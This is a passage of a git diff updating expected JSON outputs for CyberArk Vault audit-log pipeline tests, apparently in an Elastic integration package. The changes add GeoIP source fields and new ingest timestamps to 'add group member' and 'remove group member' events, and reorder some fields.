@@ -266,28 +295,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577487200Z", + "ingested": "2021-12-14T14:42:06.913528387Z", "original": "\u003c5\u003e1 2021-03-10T17:59:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:29\",\"IsoTimestamp\":\"2021-03-10T17:59:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMApp_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -303,6 +336,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -321,28 +359,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577492900Z", + "ingested": "2021-12-14T14:42:06.913528780Z", "original": "\u003c5\u003e1 2021-03-10T17:59:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:30\",\"IsoTimestamp\":\"2021-03-10T17:59:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMGw_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.14", - "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -358,6 +400,11 @@ "67.43.156.14" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -376,28 +423,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "ip": "67.43.156.14" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577498200Z", + "ingested": "2021-12-14T14:42:06.913529154Z", "original": "\u003c5\u003e1 2021-03-10T22:17:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:15\",\"IsoTimestamp\":\"2021-03-10T22:17:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.14", - "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -413,6 +464,11 @@ "67.43.156.14" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -431,28 +487,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "ip": "67.43.156.14" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577503500Z", + "ingested": "2021-12-14T14:42:06.913529531Z", "original": "\u003c5\u003e1 2021-03-10T22:19:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:16\",\"IsoTimestamp\":\"2021-03-10T22:19:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMApp_ASR-WIN\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.14", - "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -468,6 +528,11 @@ "67.43.156.14" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -486,28 +551,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "ip": "67.43.156.14" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577508700Z", + "ingested": "2021-12-14T14:42:06.913529897Z", "original": "\u003c5\u003e1 2021-03-10T22:19:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:16\",\"IsoTimestamp\":\"2021-03-10T22:19:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMGw_ASR-WIN\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -523,6 +592,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -542,28 +616,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577514100Z", + "ingested": "2021-12-14T14:42:06.913530354Z", "original": "\u003c5\u003e1 2021-03-11T16:59:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPApp_VAGRANT\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
08:59:38\",\"IsoTimestamp\":\"2021-03-11T16:59:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMPApp_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -579,6 +657,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -598,28 +681,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577519400Z", + "ingested": "2021-12-14T14:42:06.913530720Z", "original": "\u003c5\u003e1 2021-03-11T16:59:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPGW_VAGRANT\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
08:59:38\",\"IsoTimestamp\":\"2021-03-11T16:59:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMPGW_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -635,6 +722,11 @@ "67.43.156.15" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -654,28 +746,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", + "ip": "67.43.156.15" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577525Z", + "ingested": "2021-12-14T14:42:06.913531290Z", "original": "\u003c5\u003e1 2021-03-14T12:57:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPGW_SSH\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
05:57:17\",\"IsoTimestamp\":\"2021-03-14T12:57:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMPGW_SSH\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -691,6 +787,11 @@ "67.43.156.15" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -710,28 +811,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", + "ip": "67.43.156.15" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577530300Z", + "ingested": "2021-12-14T14:42:06.913531672Z", "original": "\u003c5\u003e1 2021-03-14T12:57:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPApp_SSH\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
05:57:17\",\"IsoTimestamp\":\"2021-03-14T12:57:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMPApp_SSH\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -747,6 +852,11 @@ "67.43.156.15" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -766,14 +876,30 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", + "ip": "67.43.156.15" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577535700Z", + "ingested": "2021-12-14T14:42:06.913532044Z", "original": "\u003c5\u003e1 2021-03-14T12:57:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMP_ADB_AppUsers\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
05:57:21\",\"IsoTimestamp\":\"2021-03-14T12:57:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"PSMP_ADB_asr-cyberark-psm-ssh\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log-expected.json index ef28e482a25..6791319e26e 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -46,28 +39,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "remove group member", - "ingested": "2021-12-09T13:36:43.685157200Z", + "ingested": "2021-12-14T14:42:08.547675390Z", "original": "\u003c5\u003e1 2021-03-10T17:59:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:48\",\"IsoTimestamp\":\"2021-03-10T17:59:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"266\",\"Desc\":\"Remove Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Remove Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Remove Group Member\",\"GatewayStation\":\"\"}}}", "code": "266", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.14", - "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -83,6 +80,11 @@ "67.43.156.14" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -101,14 +103,30 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "ip": "67.43.156.14" + }, "event": { "severity": 2, "action": "remove group member", - "ingested": "2021-12-09T13:36:43.685166800Z", + "ingested": "2021-12-14T14:42:08.547678207Z", "original": "\u003c5\u003e1 2021-03-10T22:19:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:23\",\"IsoTimestamp\":\"2021-03-10T22:19:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"266\",\"Desc\":\"Remove Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Remove Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Remove Group Member\",\"GatewayStation\":\"\"}}}", "code": "266", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log-expected.json index 82d2016ad8d..a12921b737a 100644 